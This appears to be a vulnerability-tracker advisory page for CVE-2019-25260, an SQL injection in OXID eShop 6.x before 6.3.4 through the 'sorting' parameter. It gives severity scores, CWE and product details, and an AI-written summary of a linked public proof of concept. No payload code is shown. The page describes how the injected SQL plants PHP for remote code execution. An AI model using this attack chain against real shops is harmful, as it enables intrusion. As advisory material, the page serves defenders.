CVE-2019-25260

HIGH

OXID eShop 6.x < 6.3.4 - SQL Injection via Sorting Parameter

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2019-25260. PoCs published by VulnSpy.

AI-analyzed exploit summary This exploit demonstrates a SQL injection vulnerability in OXID eShop versions prior to 6.3.4, allowing an attacker to inject malicious SQL queries via the 'sorting' parameter. The injected SQL inserts PHP code into the database, which can then be executed to achieve remote code execution (RCE) by accessing a specific URL.

Description

OXID eShop versions 6.x prior to 6.3.4 contains a SQL injection vulnerability in the 'sorting' parameter that allows attackers to insert malicious database content. Attackers can exploit the vulnerability by manipulating the sorting parameter to inject PHP code into the database and execute arbitrary code through crafted URLs.

Exploits (1)

exploitdb WORKING POC
by VulnSpy · textwebappsphp
https://www.exploit-db.com/exploits/48527

This exploit demonstrates a SQL injection vulnerability in OXID eShop versions prior to 6.3.4, allowing an attacker to inject malicious SQL queries via the 'sorting' parameter. The injected SQL inserts PHP code into the database, which can then be executed to achieve remote code execution (RCE) by accessing a specific URL.

Classification
Working Poc 90%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: OXID eShop versions 6.x (prior to 6.3.4)
No auth needed
Prerequisites: Access to a vulnerable OXID eShop instance · Ability to craft and send HTTP requests with malicious parameters
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (7)

Core 7

Scores

CVSS v3 8.2
EPSS 0.0041
EPSS Percentile 32.4%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact partial

Details

CWE
CWE-89
Status published
Products (1)
OXID-eSales/OXID eShop Versions 6.x (prior to 6.3.4)
Published Feb 03, 2026
Tracked Since Feb 18, 2026